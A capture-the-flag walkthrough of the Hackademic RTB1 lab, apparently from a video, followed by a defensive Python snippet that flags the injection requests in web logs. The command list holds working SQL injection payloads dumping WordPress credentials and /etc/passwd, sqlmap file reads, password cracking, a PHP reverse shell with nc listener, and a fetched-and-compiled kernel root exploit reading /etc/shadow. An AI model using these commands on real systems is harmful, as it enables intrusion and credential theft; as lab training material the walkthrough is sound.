Video

Method:
✔ Scanned network for the target [Netdiscover]
✔ Port scanned the target [UnicornScan]
✔ Banner grabbed the services running on the open port(s) [NMap]
✔ Interacted with the web server & enumerated the web application [Firefox & WPScan]
✔ Discovered & exploited an SQL injection vulnerability and downloaded the configuration files [Exploit-DB & SQLMap]
✔ Brute forced the user credentials for the web application [John The Ripper]
✔ Hijacked a plugin for the web application with a web shell backdoor [Pentestmonkey's Php-Reverse-Shell]
✔ Escalated privileges via a vulnerable kernel version [RDS Protocol exploit]
✔ Accessed the 'flag' [Text file]
✔ Discovered other 'interesting files' [Forensics analysis?]

Commands PHP:
netdiscover -r 192.168.0.1/24
us -H -msf -Iv 192.168.0.130 -p 1-65535 && us -H -mU -Iv 192.168.0.130 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.0.130 # -p 80
// firefox -> 192.168.0.130 -> Target (/Hackademic_RTB1/) -> Right click -> View source # WordPress 1.5.1.1
apt-cache show wpscan
apt-get install wpscan
cd /pentest/web/wpscan/
./wpscan.rb
./wpscan.rb --url http://192.168.0.130/Hackademic_RTB1/
cd /pentest/exploits/exploitdb/
cat files.csv | grep -i wordpress | grep 1.5.1
perl platforms/php/webapps/1033.pl
perl platforms/php/webapps/1033.pl http://192.168.0.130/Hackademic_RTB1 2
cat platforms/php/webapps/1033.pl
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0'
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 1
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 2
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 3
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 4
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 5
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 6
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,2,3,4,5
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,version(),3,4,5
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,user(),3,4,5
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,database(),3,4,5
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,load_file(/etc/passwd),3,4,5
echo -n /etc/passwd | xxd -p -
http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,load_file(0x2f6574632f706173737764),3,4,5
cd /pentest/database/sqlmap/
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --file-read=/etc/passwd
cat /pentest/database/sqlmap/output/192.168.0.130/files/_etc_passwd
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --banner --current-db --current-user --is-dba
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --dbs
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/?cat=0 --dbs
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/?cat=0 --tables -v 0
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/?cat=0 -D mysql --columns -v 0
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/?cat=0 --password -v 0
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --file-read=/etc/httpd/conf/httpd.conf
cat /pentest/database/sqlmap/output/192.168.0.130/files/_etc_httpd_conf_httpd.conf | grep DocumentRoot
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --file-read=/var/www/html/Hackademic_RTB1/wp-config.php
cat /pentest/database/sqlmap/output/192.168.0.130/files/_var_www_html_Hackademic_RTB1_wp-config.php
#firefox sqlhack.com -> crack a MySQL pass in 1 minute -> SQL Hack Proof-of-Concept # wget http://sqlhack.com/poc.c
cd /pentest/passwords/john
./john
./john /tmp/crackme --wordlist=/tmp/pass --format=MYSQL
#./john /tmp/crackme --show
firefox wordpress.org -> Database_Description -> WordPress 1.5 # http://codex.wordpress.org/Database_Description/1.5
http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,count(*),3,4,5 from wp_users
http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users
curl --silent http://192.168.0.130/Hackademic_RTB1/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass%29,3,4,5%20from%20wp_users | grep page | sed 's/.*;\(.*\)&.*//'
for x in $(seq 1 6); do curl --silent http://192.168.0.130/Hackademic_RTB1/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass,0x3a,user_level%29,3,4,5%20from%20wp_users%20where%20ID=$x | grep page | sed 's/.*;\(.*\)&.*//'; done # Could even use the first SQL injection for count
for x in $(seq 1 6); do curl --silent http://192.168.0.130/Hackademic_RTB1/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass%29,3,4,5%20from%20wp_users%20where%20ID=$x | grep page | sed 's/.*;\(.*\)&.*//' >> /tmp/wordpress; done
cd /pentest/password/john
./john /tmp/crack --wordlist=/pentest/passwords/wordlists/darkc0de.lst --format=raw-MD5
http://192.168.0.130/Hackademic_RTB1/wp-admin/ # GeorgeMiller // q1w2e3
#Plugins -> Hello Dolly -> Activate. Manage -> Files -> textile1.php
cd /pentest/backdoors/web/webshells/
cat php-reverse-shell.php # Edit IP & port
nc -lvvp 443
curl http://192.168.0.130/Hackademic_RTB1/wp-content/plugins/textile1.php; exit
uname -a
cd /pentest/exploits/exploitdb
cat files.csv | grep "linux,local" | grep "Local Privilege Escalation"
head platforms/linux/local/15285.c
cp platforms/linux/local/15285.c /var/www/
nano /var/www/15285.c # add "//" on line 1
chmod +x /var/www/15285.c
/etc/init.d/apache2 start
cd /tmp
wget 192.168.0.162/15285.c -O root.c
gcc root.c -o root
./root
id
ifconfig && uname -a && cat /etc/shadow && ls -lAh /root
cat /root/key.txt
#cat /root/.bash_history
#ls -lAh /root/.local/share/Trash/files
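Seen from the web server's side, the request trail above leaves a very recognisable footprint in the access log. The following Python example is added here and is not part of the video or its author's command list: it URL-decodes each request target and flags the UNION/load_file/wp_users patterns, the sequence of `order by N` column-count probes from one IP, and the direct hit on a PHP file under wp-content/plugins. The log lines, IPs and timestamps are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache access-log lines that mirror the request pattern in the
# walkthrough (IPs, timestamps, sizes and status codes are made up).
SAMPLE_LOG = """\
192.168.0.162 - - [01/Jan/2011:10:00:01 +0000] "GET /Hackademic_RTB1/index.php?cat=0%20order%20by%201 HTTP/1.1" 200 5120
192.168.0.162 - - [01/Jan/2011:10:00:02 +0000] "GET /Hackademic_RTB1/index.php?cat=0%20order%20by%202 HTTP/1.1" 200 5120
192.168.0.162 - - [01/Jan/2011:10:00:03 +0000] "GET /Hackademic_RTB1/index.php?cat=0%20order%20by%203 HTTP/1.1" 200 5120
192.168.0.162 - - [01/Jan/2011:10:00:09 +0000] "GET /Hackademic_RTB1/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass%29,3,4,5%20from%20wp_users HTTP/1.1" 200 6000
192.168.0.162 - - [01/Jan/2011:10:00:10 +0000] "GET /Hackademic_RTB1/index.php?cat=0%20union%20select%201,load_file(0x2f6574632f706173737764),3,4,5 HTTP/1.1" 200 6200
192.168.0.162 - - [01/Jan/2011:10:05:00 +0000] "GET /Hackademic_RTB1/wp-content/plugins/textile1.php HTTP/1.1" 200 0
192.168.0.55 - - [01/Jan/2011:10:06:00 +0000] "GET /Hackademic_RTB1/index.php?cat=1 HTTP/1.1" 200 5120
"""

# Apache combined/common log: client IP, timestamp, method, request target, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Signatures applied to the URL-decoded, lower-cased request target, so that
# %20 / %28 encoding (as used with curl above) does not hide the keywords.
RULES = {
    "union_select":   re.compile(r"\bunion\s+(all\s+)?select\b"),
    "load_file":      re.compile(r"\bload_file\s*\("),
    "wp_users_read":  re.compile(r"\bfrom\s+wp_users\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b"),
    "plugin_php_hit": re.compile(r"/wp-content/plugins/[^/?]+\.php(\?|$)"),
}
PROBE_THRESHOLD = 3  # 'order by N' probes from one IP before calling it column enumeration


def analyze(log_text):
    """Return one finding (dict) per rule that matches a parsed log line."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        ip, ts, method, target, status = m.groups()
        decoded = unquote_plus(target).lower()
        for name, rx in RULES.items():
            if rx.search(decoded):
                findings.append({"rule": name, "ip": ip, "time": ts,
                                 "status": status, "target": target})
    return findings


def enumerating_ips(findings, threshold=PROBE_THRESHOLD):
    """IPs whose 'order by N' probe count reaches the threshold (column-count enumeration)."""
    probes = Counter(f["ip"] for f in findings if f["rule"] == "order_by_probe")
    return sorted(ip for ip, n in probes.items() if n >= threshold)
```

The `plugin_php_hit` rule also fires on legitimate plugin endpoints, so treat it as a review trigger that gains weight when it follows injection findings from the same client, not as an alert on its own.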
Got root quickly, but in the video pulling the admin's login and password through the SQLi takes 12 minutes, which in my opinion isn't great. P.S. What browser plugin was that, the one that removed the stupid %20 characters from the address bar?